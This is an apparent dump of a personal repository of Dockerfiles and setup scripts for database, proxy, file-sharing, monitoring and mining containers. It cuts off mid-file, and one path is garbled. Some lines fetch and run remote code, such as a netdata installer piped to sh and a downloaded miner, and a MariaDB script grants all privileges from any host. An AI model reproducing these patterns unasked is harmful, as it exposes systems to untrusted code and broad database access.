"content_id": "0594af0f0a1c9b21f0f9a3244215d6432f751324",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2852,
"license_type": "no_license",
"max_line_length": 146,
"num_lines": 68,
"path": "/07-putitall/web.py",
"repo_name": "flyingbest/head-first-python",
"src_encoding": "UTF-8",
"text": "# Putting it all together\n\n# It's good to share.\n# You can put your program on the Web.\n# If you develop your program as a Web-based application (or webapp, for short), your program is:\n#\t\tAvailable to everyone who can get to your website\n#\t\tIn one place on your web server\n#\t\tEasy to update as new functionality is needed\n\n# Webapps up Close\n# web request, web response, Common Gateway Interface(CGI)\n\n# Design your webapp with MVC(Model-View-Controller)\n\n\"\"\"\nNow that you have an idea of the pages your webapp needs to provide, your next question should be: what's the best way to build this thing?\nDespite this, the general consensus is that great webapps conform to the Model-View-Controller pattern which helps you segment your webapp's code\ninto easily manageable functional chunks (or components):\n\tThe Model: The code to store(and sometiems process) your webapp's data\n\tThe View: The code to format and display your webapp's user interface(s)\n\tThe Controller: The code to glue your webapp together and provide its business logic\n\nBy following the MVC pattern, you build your webapp in such as way as to enable your webapp to grow as new requirements dictate.\nYou also open up the possibility of splitting the workload among a number of people, one for each component.\n\"\"\"\n\n# Model your data \n# make a athletemodel.py file.\n\n# View your interface\n# YATE folder download. and checking code.\n\n# Control your code\n# download webapp folder.\n# CGI lets your web server run programs.\n# Display the list of athletes.\n\"\"\"\nRecall that all of your CGI scripts nees to reside in the cgi-bin folder on your web server.\ncreating generate_list.py CGI script sends its data to another program called:\n\"\"\"\n\n# Test\n# $ python3 simple_httpd.py\n# check the url in http://localhost:8080\n\n# The dreaded 404 error!\n# The 404 error is exactly what you would expect to be displayed in this situation, so your generate_list.py CGI is working fine.\n# What's needed is the code to the other CGI script.\n\n# Create another CGI script\n# create generate_timing_data.py CGI script\n\n# Enable CGI tracking to help with errors\n# import cgitb\n# cgitb.enable()\n\n# A small change can make all the difference\n# @property - This decorator allows you to access the data returned by \"top3()\" as if it were a class attribute.\n# It's a small change, but it's an important one.\n\"\"\"\nwhen a change is made to the way a class is used, you need to be careful to consider what impact the change has on existing programs,\nboth yours ans those written by others.\n\nAt the moment, you are the only one using the AthleteList class, so it's not a big deal to fix this.\nBut imagine if thousands of programmers were using and relying on your code...\n\"\"\"\n\n# By conforming to the MVC pattern and using CGI, you've built a webapp in such a way that it's easy to extend as new requirements are identified.\n\n"
},
{
"alpha_fraction": 0.6450819969177246,
"alphanum_fraction": 0.6811475157737732,
"avg_line_length": 27.34883689880371,
"blob_id": "79f44533e25b081cef75faa28a8b0fbbf52acf3a",
"content_id": "e2eae43ebebd63d344bee520295df1d8f9fd9189",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1220,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 43,
"path": "/tutorial/lambda.py",
"repo_name": "flyingbest/head-first-python",
"src_encoding": "UTF-8",
"text": "# Lambdas \n\n# Lambda expressions (sometimes called lambda forms) are used to create anonymous functions.\n# The expression lambda arguments: expression yields a function object.\n# The unnamed object behaves like a function object defined with:\n# \tdef <lambda>(arguments):\n# \t\treturn expression\n\n# Using like this:\n# \tlambda <parameter_list>: expression\t\n\ndef hap(x, y):\n\treturn x+y\n\nprint(hap(10, 20))\n\nprint((lambda x,y: x+y)(10, 20))\n\n# map(func, list)\nmap(lambda x: x ** 2, range(5))\nprint(map(lambda x: x ** 2, range(5)))\nprint(list(map(lambda x: x**2, range(5))))\n\n# reduce(func, ordered data)\n# you must imort like this:\nfrom functools import reduce\nreduce(lambda x,y: x+y, [0, 1, 2, 3, 4])\nprint(reduce(lambda x,y: x+y, [0, 1, 2, 3, 4]))\n\n# testing this example\n# why this reduce func print 'edcba' ? explain it. \nreduce(lambda x,y: y+x, 'abcde')\nprint(reduce(lambda x,y: y+x, 'abcde'))\n\n# filter(func, list)\nfilter(lambda x: x<5, range(10))\nlist(filter(lambda x: x<5, range(10)))\nprint(list(filter(lambda x: x<5, range(10))))\n\n# creating func that returns odd number \nprint(list(filter(lambda x: x%2, range(10))))\nprint(list(filter(lambda x: x%2!=0, range(10))))\nprint(list(filter(lambda x: x%2==0, range(10))))\n\n"
},
{
"alpha_fraction": 0.7093425393104553,
"alphanum_fraction": 0.7093425393104553,
"avg_line_length": 25.272727966308594,
"blob_id": "ab5b6fdc4e0339c86d997cfd73f3b4e1d8a31e72",
"content_id": "0c84db179c022780eebc57245076e39e53f7b79e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 289,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 11,
"path": "/02-functions/nester.py",
"repo_name": "flyingbest/head-first-python",
"src_encoding": "UTF-8",
"text": "\"\"\"\nThis is the \"nester.py\" module, and it provides one function called print_lol()\nwhich prints lists that may or may not include nested lists.\n\"\"\"\n\ndef print_lol(the_list):\n\tfor each_item in the_list:\n\t\tif isinstance(each_item, list):\n\t\t\tprint_lol(each_item)\n\t\telse:\n\t\t\tprint(each_item)\n"
},
{
"alpha_fraction": 0.7020584940910339,
"alphanum_fraction": 0.7053087949752808,
"avg_line_length": 29.75,
"blob_id": "17306d88e6f9d2e763c58d04b3662fa8ce01c79e",
"content_id": "6e47a5971bb285ede0dc51bbdb7d46f6d3a371a4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1846,
"license_type": "no_license",
"max_line_length": 152,
"num_lines": 60,
"path": "/07-putitall/athletemodel.py",
"repo_name": "flyingbest/head-first-python",
"src_encoding": "UTF-8",
"text": "import pickle\nfrom athletelist import AthleteList\n\n# two ways of import\n\"\"\"\nimport <module>\nfrom <module> import <variable>or<function>\n\"\"\"\n\ndef get_coach_data(filename):\n\ttry:\n\t\twith open(filename) as f:\n\t\t\tdata = f.readline()\n\t\ttempl = data.strip().split(',')\n\t\treturn(AthleteList(templ.pop(0), templ.pop(0), templ))\n\texcept IOError as ioerr:\n\t\tprint('File error: ' + str(ioerr))\n\t\treturn(None)\n\ndef put_to_store(files_list):\n\tall_athletes = {}\n\tfor each_file in files_list:\n\t\tath = get_coach_data(each_file)\n\t\tall_athletes[ath.name] = ath\n\ttry:\n\t\twith open('athletes.pickle', 'wb') as athf:\n\t\t\tpickle.dump(all_athletes, athf)\n\texcept IOError as ioerr:\n\t\tprint('File error(put_and_store): ' + str(ioerr))\n\treturn(all_athletes)\n\ndef get_from_store():\n\tall_athletes = {}\n\ttry:\n\t\twith open('athletes.pickle', 'rb') as athf:\n\t\t\tall_athletes = pickle.load(athf)\n\texcept IOError as ioerr:\n\t\tprint('File error(get_from_store): ' + str(ioerr))\n\treturn(all_athletes)\n\n#print(dir())\n\nthe_files = ['sarah2.txt', 'james2.txt', 'mikey2.txt', 'julie2.txt']\ndata = put_to_store(the_files)\nprint(data)\n\n# At this point, the athletes.pickle file should appear in the same folder as your code and text files. Recall that this file is a binary file,\n# so trying to view it in IDLE or in your editer is not going to make much sense. To access the data, \n# use the dictionary returned by the put_to_store() or get_from_store() functions.\n\nfor each_athlete in data:\n\tprint(data[each_athlete].name + ' ' + data[each_athlete].dob)\n\n# Use the get_from_store() function to load the pickled data into another dictionary, then confirm that the result are as expected by repeating the code\n# to display each athlete's name and date of birth:\n\ndata_copy = get_from_store()\n\nfor each_athlete in data_copy:\n\tprint(data_copy[each_athlete].name + ' ' + data[each_athlete].dob)\n\n"
}
] | 22 |
reizer-fs/docker
|
https://github.com/reizer-fs/docker
|
e6bd137a93168f3842fb1bf9d6b37da936afafae
|
6325b0fdebe66c0ecb3b37fcde805986ff2b08d2
|
07ac1137861a52c4d528c6ffb277a5990df8e778
|
refs/heads/master
| 2022-12-10T16:12:39.813187 | 2022-02-18T17:38:34 | 2022-02-18T17:38:34 | 67,445,727 | 0 | 0 | null | 2016-09-05T19:25:14 | 2022-02-05T20:57:25 | 2022-12-08T01:55:31 |
Shell
|
[
{
"alpha_fraction": 0.6942148804664612,
"alphanum_fraction": 0.71074378490448,
"avg_line_length": 19.16666603088379,
"blob_id": "1ae7031abc852aba3cd5008c7a206bff64f84c3a",
"content_id": "9b7534126162a003d646b41b6378fab20f77bc7a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 242,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 12,
"path": "/alpine-mysql/Dockerfile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "FROM alpine\n\nRUN apk update && apk add mariadb mariadb-client\nRUN addgroup mysql mysql && rm -rf /var/cache/apk/*\n\nCOPY ./startup.sh /bin/startup.sh\n\nVOLUME [\"/var/lib/mysql\"]\nEXPOSE 3306\nRUN chmod +x /bin/startup.sh\n\nCMD [\"/bin/startup.sh\"]\n"
},
{
"alpha_fraction": 0.6840909123420715,
"alphanum_fraction": 0.6886363625526428,
"avg_line_length": 43,
"blob_id": "31c342730ebb8865d9e563689bfec21eed4bb02b",
"content_id": "33531a4e7a983480abe3930072ca40856542d768",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 440,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 10,
"path": "/alpine-jekyll/Dockerfile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "FROM alpine\n\n# Install base, Ruby, Headers, Jekyll, Export Path and Clean Up\nRUN apk update && apk upgrade && apk add curl wget bash && \\\n apk add ruby ruby-bundler ruby-dev ruby-irb ruby-rdoc libatomic readline readline-dev \\\n libxml2 libxml2-dev libxslt libxslt-dev zlib-dev zlib \\\n libffi-dev build-base git nodejs && \\\n export PATH=\"/root/.rbenv/bin:$PATH\" && \\\n rm -rf /var/cache/apk/* && \\\n gem install github-pages\n"
},
{
"alpha_fraction": 0.7323232293128967,
"alphanum_fraction": 0.7348484992980957,
"avg_line_length": 21,
"blob_id": "847289c53e023937bcdc3d24e0832e918e75c439",
"content_id": "41e6aeb03c0d95d392013e2e1b35b33708cf3103",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 396,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 18,
"path": "/alpine-testssl/Dockerfile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "FROM alpine:latest\n\nRUN apk update && apk upgrade\nRUN apk add bash procps drill git coreutils\n\nRUN addgroup testssl\nRUN adduser -G testssl -g \"testssl user\" -s /bin/bash -D testssl\n\nRUN ln -s /home/testssl/testssl.sh/testssl.sh /usr/local/bin/\n\nUSER testssl\nWORKDIR /home/testssl/\n\nRUN git clone --depth=1 https://github.com/reizer-fs/scripts.git .\n\nENTRYPOINT [\"testssl.sh\"]\n\nCMD [\"/bin/bash\"]\n"
},
{
"alpha_fraction": 0.6179378628730774,
"alphanum_fraction": 0.6242938041687012,
"avg_line_length": 35.30769348144531,
"blob_id": "a0d83fcf0e204c46642ac209e1a1728c89ec6c05",
"content_id": "34fb774f002789f1f5daf76e53d70f66d7f5e813",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1416,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 39,
"path": "/suse-mysql/create_mariadb_admin_user.sh",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nmysql -uroot -e \"status\" > /dev/null 2>&1 || /usr/bin/mysqld_safe > /dev/null 2>&1 &\n\nRET=1\nwhile [[ RET -ne 0 ]]; do\n echo \"=> Waiting for confirmation of MariaDB service startup\"\n sleep 5\n mysql -uroot -e \"status\" > /dev/null 2>&1\n RET=$?\ndone\n\n\necho \"=> Creating MariaDB admin user with $ADMIN_PASS password\"\n\nmysql -uroot -e \"CREATE USER '$ADMIN_USER'@'%' IDENTIFIED BY '$ADMIN_PASS'\"\nmysql -uroot -e \"GRANT ALL PRIVILEGES ON *.* TO '$ADMIN_USER'@'%' IDENTIFIED BY '$RESTRICTED_USER_PASSWORD' WITH GRANT OPTION\"\n\necho \"=> Creating MariaDB $RESTRICTED_USER user with $RESTRICTED_USER_PASSWORD password\"\nmysql -uroot -e \"CREATE USER '$RESTRICTED_USER'@'%' IDENTIFIED BY '$RESTRICTED_USER_PASSWORD'\"\n\nfor DB in $RESTRICTED_DB ; do \nmysql -uroot -e \"CREATE DATABASE $DB\"\nmysql -uroot -e \"GRANT ALL PRIVILEGES ON $DB.* TO '$RESTRICTED_USER'@'%' IDENTIFIED BY '$RESTRICTED_USER_PASSWORD' WITH GRANT OPTION\"\ndone\n\n\necho \"=> Done!\"\n\necho \"========================================================================\"\necho \"You can now connect to this MariaDB Server using:\"\necho \"\"\necho \" mysql -uadmin -p$PASS -h<host> -P<port>\"\necho \"\"\necho \"Please remember to change the above password as soon as possible!\"\necho \"MariaDB user 'root' has no password but only allows local connections\"\necho \"========================================================================\"\n\nmysqladmin -uroot shutdown\n"
},
{
"alpha_fraction": 0.6785110235214233,
"alphanum_fraction": 0.720812201499939,
"avg_line_length": 22.639999389648438,
"blob_id": "1a5d0a67899316225f61322f7fd1bac4b303d891",
"content_id": "87db6f61a9f54985573b901c7bdbd40bfa87ac60",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 591,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 25,
"path": "/suse-squid/Dockerfile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "FROM opensuse:42.2\n\nMAINTAINER Horus \"[email protected]\"\n#ENV http_proxy=http://proxy:8080/\n#ENV https_proxy=http://proxy:8080/\nENV SQUID_VERSION=3.4.4 \\\n SQUID_CACHE_DIR=/var/cache/squid \\\n SQUID_LOG_DIR=/var/log/squid \\\n SQUID_USER=squid\n\n# make sure the repositories are up to date\nRUN zypper ref -s\nRUN zypper in --auto-agree-with-licenses -y squid\n\nEXPOSE 3128\n\nCOPY squid.conf /etc/squid/squid.conf\nCOPY ads.regexp /etc/squid/\nCOPY entrypoint.sh /etc/entrypoint.sh\nRUN chmod 755 /etc/entrypoint.sh\n\nEXPOSE 3128/tcp\nVOLUME [\"${SQUID_CACHE_DIR}\"]\n\nCMD [\"/bin/bash\", \"/etc/entrypoint.sh\"]\n"
},
{
"alpha_fraction": 0.6366508603096008,
"alphanum_fraction": 0.6524486541748047,
"avg_line_length": 23.346153259277344,
"blob_id": "bb42543a57a69e31df14f6357aa64f6105f65516",
"content_id": "2b40841a83d675d1560d08e291e226712e0634db",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 633,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 26,
"path": "/suse-ftp/docker-run.sh",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "VIP=\"ftp\"\nENV_DIRECTORY=\"/data/docker/ftp/$VIP\"\nFTP_DIR=\"box downloads\"\nIP_VHOST=`getent hosts $VIP | awk '{print $1}'`\n\nif [ ! -d $ENV_DIRECTORY ] ; then\n\tmkdir -p $ENV_DIRECTORY/shares\n\tmkdir -p $ENV_DIRECTORY/etc/\nfi\n\nif [ \"$(ls -A $ENV_DIRECTORY/etc 2> /dev/null)\" != \"\" ]; then\n\tDOCKER_VOLUMES=\" -v $ENV_DIRECTORY/etc/:/etc/proftpd/\"\nfi\n\nfor i in $FTP_DIR ; do \n\tmkdir -p $ENV_DIRECTORY/shares/$i\n\tDOCKER_VOLUMES=\"$DOCKER_VOLUMES -v $ENV_DIRECTORY/shares/$i:/shares/$i\"\ndone\n\ndocker run -it -h $VIP \\\n--name $VIP \\\n-p $IP_VHOST:20:20 -p $IP_VHOST:21:21 \\\n$DOCKER_VOLUMES \\\n-d suse-ftp \\\n-e USERNAME=ffx \\\n-e PASSWORD=passwd\n"
},
{
"alpha_fraction": 0.7022900581359863,
"alphanum_fraction": 0.7442747950553894,
"avg_line_length": 19.153846740722656,
"blob_id": "370d00b9ea900d8048f183d5e32b1d9064e95a56",
"content_id": "9bb3e62bf0297e59cfcc5131e773fe9a99d28859",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 262,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 13,
"path": "/suse-torrent/Dockerfile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "FROM opensuse:42.2\n\nMAINTAINER Horus \"[email protected]\"\nENV http_proxy=http://proxy:8080/\nENV https_proxy=http://proxy:8080/\nENV TERM=xterm\n\nRUN zypper in -y vim wget tar mlocate rtorrent\nRUN zypper clean -a\n\nCOPY rtorrent.rc /root/.rtorrent.rc\n\nENTRYPOINT [\"/bin/bash\"]\n"
},
{
"alpha_fraction": 0.739393949508667,
"alphanum_fraction": 0.7818182110786438,
"avg_line_length": 35.55555725097656,
"blob_id": "f829c74dfaaf68ed177767b7228f9304b1e31baa",
"content_id": "e3cd2ed911e6e4485f238652e1e011861979866a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 330,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 9,
"path": "/alpine-netdata/Dockerfile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "\nFROM alpine\n\nRUN apk add --no-cache curl sudo\nRUN curl https://my-netdata.io/kickstart-static64.sh >/tmp/kickstart-static64.sh\nRUN yes | sh /tmp/kickstart-static64.sh\n\nENV NETDATA_PORT=19999 SSMTP_TLS=YES SSMTP_SERVER=smtp.gmail.com SSMTP_PORT=587 SSMTP_HOSTNAME=localhost\nEXPOSE $NETDATA_PORT\nCMD \"/opt/netdata/bin/srv/netdata\"\n"
},
{
"alpha_fraction": 0.7469879388809204,
"alphanum_fraction": 0.7603748440742493,
"avg_line_length": 28.8799991607666,
"blob_id": "5789ae82e7d6dfe228de9d544f44c1139f4a8331",
"content_id": "b11fb59e5c07da62ad61b36aaccdd9deda320d07",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 747,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 25,
"path": "/suse-mysql/Dockerfile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "FROM opensuse:42.2\n\nMAINTAINER Horus \"[email protected]\"\n\n# make sure the repositories are up to date\nRUN zypper ref -s\nRUN zypper in -y mariadb\nRUN zypper in -y pwgen\nRUN zypper clean -a\nRUN rm -rf /var/lib/mysql/*\n\n# Add MySQL configuration\nADD create_mariadb_admin_user.sh /etc/create_mariadb_admin_user.sh\nADD entrypoint.sh /etc/entrypoint.sh\nRUN echo \"cat /etc/hostname\" > /usr/bin/hostname\nRUN chmod 775 /usr/bin/hostname /etc/entrypoint.sh /etc/create_mariadb_admin_user.sh\n\n# Add VOLUMEs to allow backup of config and databases\nVOLUME [\"/etc/mysql\", \"/var/lib/mysql\"]\n\n#Added to avoid in container connection to the database with mysql client error message \"TERM environment variable not set\"\nENV TERM xterm\n\nEXPOSE 3306\nCMD [\"/etc/entrypoint.sh\"]\n"
},
{
"alpha_fraction": 0.621026873588562,
"alphanum_fraction": 0.645476758480072,
"avg_line_length": 21.108108520507812,
"blob_id": "28d4a73afac5f22bc52eb3372052fee99ffc3985",
"content_id": "9101165bbdfffd43eea8a1ae1fb3400f49379446",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 818,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 37,
"path": "/debian-kali/docker-run.sh",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n\nhelp () {\n echo \"Usage: $0 hostname type(optional)\"\n\techo \"type = mysql apache squid samba torrent gitlab gcc kali\"\n}\n\nif [ $# -lt 1 ] ; then\n\thelp && exit 1\nfi\n\n\nHOSTNAME=$1\nTYPE=$2\ncase $TYPE in\n\tmysql) CONTAINER=\"suse-mysql\" ; PORTS=\"3306\" ;;\n\tapache)CONTAINER=\"suse-apache\" ; PORTS=\"80 443\";;\n\tsquid) CONTAINER=\"suse-squid\" ; PORTS=\"3128\" ;;\n\tsamba) CONTAINER=\"suse-samba\" ; PORTS=\"\" ;;\n\ttorrent) CONTAINER=\"suse-torrent\";;\n\tgitlab) CONTAINER=\"suse-gitlab\";;\n\tgcc) CONTAINER=\"suse-gcc\";;\n\tkali) CONTAINER=\"kalilinux/kali-linux-docker\";;\n\t*) help && exit 1 ;;\nesac\n\nVIP=`getent hosts $HOSTNAME | awk '{print $1}'`\nENV_DIRECTORY=\"/data/docker/$TYPE/$HOSTNAME\"\n\nif [ ! -d $ENV_DIRECTORY ] ; then\n mkdir -p $ENV_DIRECTORY\nfi\ndocker run -it -d \\\n--name $HOSTNAME \\\n-h $HOSTNAME \\\n$CONTAINER\n"
},
{
"alpha_fraction": 0.7638888955116272,
"alphanum_fraction": 0.7638888955116272,
"avg_line_length": 35,
"blob_id": "b1ace052da2d9bdc4ba63d698cec8a8c0dabb804",
"content_id": "6a775edb6f29fbf945dc2e258ecefd892505315d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 72,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 2,
"path": "/centos-centreon/run.sh",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "chown -R centreon. /usr/share/centreon\nchown -R centreon. /etc/centreon\n"
},
{
"alpha_fraction": 0.6766809821128845,
"alphanum_fraction": 0.7303290367126465,
"avg_line_length": 54.91999816894531,
"blob_id": "33a6f2633419fcd19f38d491c9ea5e8b038d3566",
"content_id": "85e90ea9feb34d6ca298ea065e613f4d9bd89ae5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 1398,
"license_type": "no_license",
"max_line_length": 221,
"num_lines": 25,
"path": "/debian-ethminer/Dockerfile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "FROM ubuntu:focal\n\nENV DEBIAN_FRONTEND=noninteractive\n\nRUN apt update && apt -y upgrade\nRUN apt install -y --no-install-recommends libnuma-dev gnupg2 nano wget ca-certificates python3-pip\n\nRUN wget -q -O - https://repo.radeon.com/rocm/rocm.gpg.key | apt-key add -\nRUN echo 'deb [arch=amd64] https://repo.radeon.com/rocm/apt/debian/ xenial main' | tee /etc/apt/sources.list.d/rocm.list\nRUN apt update\n\nRUN groupadd render\nRUN usermod -a -G video root && usermod -a -G render root\nRUN mkdir --parents /etc/udev/rules.d\nRUN echo 'SUBSYSTEM==\"kfd\", KERNEL==\"kfd\", TAG+=\"uaccess\", GROUP=\"video\"' |tee /etc/udev/rules.d/70-kfd.rules\n\nRUN apt install -y miopen-hip4.0.0 hipblas4.0.0 hipsparse4.0.0 rccl4.0.0 roctracer-dev4.0.0 rocm-libs4.0.0 rocm-smi4.0.0 miopengemm4.0.0\nRUN cp /opt/rocm-4.0.0/hip/lib/libamdhip64.so.4.0.40000 /lib/libamdhip64.so.3\nRUN find /opt/rocm-4.0.0/ -type d | grep 'lib$' > /etc/ld.so.conf.d/rocm.conf\nRUN ldconfig -v\n\nENV ETH_WALLET=<your_ethereum_wallet_address>\nENV WORKERNAME=some_workername\nRUN cd /root && mkdir ethminer && cd ethminer && wget https://github.com/ethereum-mining/ethminer/releases/download/v0.18.0/ethminer-0.18.0-cuda-9-linux-x86_64.tar.gz && tar xzvf ethminer-0.18.0-cuda-9-linux-x86_64.tar.gz\nRUN printf '#!/bin/bash\\n./root/ethminer/bin/ethminer -P stratum1+tcp://${ETH_WALLET}.${WORKERNAME}@eu1.ethpool.org:3333' >> /usr/bin/run_ethminer && chmod +x /usr/bin/run_ethminer\n"
},
{
"alpha_fraction": 0.6447963714599609,
"alphanum_fraction": 0.7285068035125732,
"avg_line_length": 39.181819915771484,
"blob_id": "c5c13c464ea97362bce8bc3493866b338cc192bd",
"content_id": "c9c046f9aa4813aa590828ae2478a681b3e4df4d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 442,
"license_type": "no_license",
"max_line_length": 229,
"num_lines": 11,
"path": "/alpine-php-fpm/Dockerfile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "FROM alpine\n\nRUN apk update && apk add php5-cli php5-fpm php5-mysql\nRUN apk add php5-fpm php5-json php5-zlib php5-xml php5-pdo php5-phar php5-openssl php5-pdo_mysql php5-mysqli php5-gd php5-iconv php5-mcrypt php5-curl php5-opcache php5-ctype php5-apcu php5-intl php5-bcmath php5-dom php5-xmlreader\n\nRUN rm -rf /var/cache/apk/*\n\nRUN sed -i 's/^listen =.*$/listen = 0\\.0\\.0\\.0:9000/g' /etc/php5/php-fpm.conf\nEXPOSE 9000\n\nCMD [\"php-fpm5\", \"-F\"]\n"
},
{
"alpha_fraction": 0.6804191470146179,
"alphanum_fraction": 0.692861795425415,
"avg_line_length": 37.17499923706055,
"blob_id": "59ec36830aaf22ad4c638913822b79bafa257301",
"content_id": "2fa2a977fc7fcf39b76ec35827147978f5f0c0b8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1527,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 40,
"path": "/suse-percona/�!",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nset -e\nchown -R pmm:pmm /opt/prometheus/data && \\\nchown -R pmm:pmm /opt/consul-data\n\n# Prometheus\nif [[ ! \"${METRICS_RESOLUTION:-1s}\" =~ ^[1-5]s$ ]]; then\n echo \"METRICS_RESOLUTION takes only values from 1s to 5s.\"\n exit 1\nfi\nsed -i \"s/1s/${METRICS_RESOLUTION:-1s}/\" /opt/prometheus/prometheus.yml\nsed -i \"s/ENV_METRICS_RETENTION/${METRICS_RETENTION:-720h}/\" /etc/supervisor/supervisord.conf\nsed -i \"s/ENV_METRICS_MEMORY/${METRICS_MEMORY:-262144}/\" /etc/supervisor/supervisord.conf\n\n# Orchestrator\nsed -i \"s/orc_client_user/${ORCHESTRATOR_USER:-orc_client_user}/\" /etc/orchestrator.conf.json\nsed -i \"s/orc_client_password/${ORCHESTRATOR_PASSWORD:-orc_client_password}/\" /etc/orchestrator.conf.json\n\n# Cron\nsed -i \"s/^INTERVAL=.*/INTERVAL=${QUERIES_RETENTION:-8}/\" /etc/cron.daily/purge-qan-data\n\n# SSL\nif [ -e /etc/nginx/ssl/server.crt ] && [ -e /etc/nginx/ssl/server.key ]; then\n sed -i 's/#include nginx-ssl.conf/include nginx-ssl.conf/' /etc/nginx/nginx.conf\n if [ -e /etc/nginx/ssl/dhparam.pem ]; then\n sed -i 's/#ssl_dhparam/ssl_dhparam/' /etc/nginx/nginx-ssl.conf\n fi\nfi\n\n# HTTP basic auth\nif [ -n \"$SERVER_PASSWORD\" ]; then\n echo \"${SERVER_USER:-pmm}:$(openssl passwd -apr1 $SERVER_PASSWORD)\" > /etc/nginx/.htpasswd\n sed -i 's/auth_basic off/auth_basic \"PMM Server\"/' /etc/nginx/nginx.conf\n\n ENV_AUTH_BASIC=\"cfg:default.auth.basic.enabled=false\"\nfi\nsed -i \"s/ENV_AUTH_BASIC/${ENV_AUTH_BASIC}/\" /etc/supervisor/supervisord.conf\n\nsupervisord -c /etc/supervisor/supervisord.conf\n"
},
{
"alpha_fraction": 0.5698234438896179,
"alphanum_fraction": 0.5906901955604553,
"avg_line_length": 43.5,
"blob_id": "4f098a920118e386c4428b4ff2bbaa5b56c229df",
"content_id": "e69791faa10f5f746aa7f67accbb02afb283ea26",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 1246,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 28,
"path": "/suse-samba/Dockerfile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "FROM opensuse:13.2\n\nMAINTAINER Horus \"[email protected]\"\n\nRUN zypper ref -s && zypper --disable-system-resolvables -n in samba\nRUN useradd -c 'Samba User' -d /tmp -M -r smbuser && \\\n sed -i 's|^\\( log file = \\).*|\\1/dev/stdout|' /etc/samba/smb.conf && \\\n sed -i 's|^\\( unix password sync = \\).*|\\1no|' /etc/samba/smb.conf && \\\n sed -i '/Share Definitions/,$d' /etc/samba/smb.conf && \\\n echo ' security = user' >>/etc/samba/smb.conf && \\\n echo ' directory mask = 0775' >>/etc/samba/smb.conf && \\\n echo ' force create mode = 0664' >>/etc/samba/smb.conf && \\\n echo ' force directory mode = 0775' >>/etc/samba/smb.conf && \\\n echo ' force user = smbuser' >>/etc/samba/smb.conf && \\\n echo ' force group = users' >>/etc/samba/smb.conf && \\\n echo ' load printers = no' >>/etc/samba/smb.conf && \\\n echo ' printing = bsd' >>/etc/samba/smb.conf && \\\n echo ' printcap name = /dev/null' >>/etc/samba/smb.conf && \\\n echo ' disable spoolss = yes' >>/etc/samba/smb.conf && \\\n echo ' socket options = TCP_NODELAY' >>/etc/samba/smb.conf && \\\n echo '' >>/etc/samba/smb.conf\n\nRUN zypper clean -a\nCOPY samba.sh /usr/bin/\nRUN chmod +x /usr/bin/samba.sh \nEXPOSE 137 139 445\n\nENTRYPOINT [\"/usr/bin/samba.sh\"]\n"
},
{
"alpha_fraction": 0.6978417038917542,
"alphanum_fraction": 0.7158273458480835,
"avg_line_length": 18.85714340209961,
"blob_id": "29063c488cd7b99756dc3a0e30a9e2775da45b6b",
"content_id": "9e0f530390fb8ef946fe6aaa65375f13c8818c1e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 278,
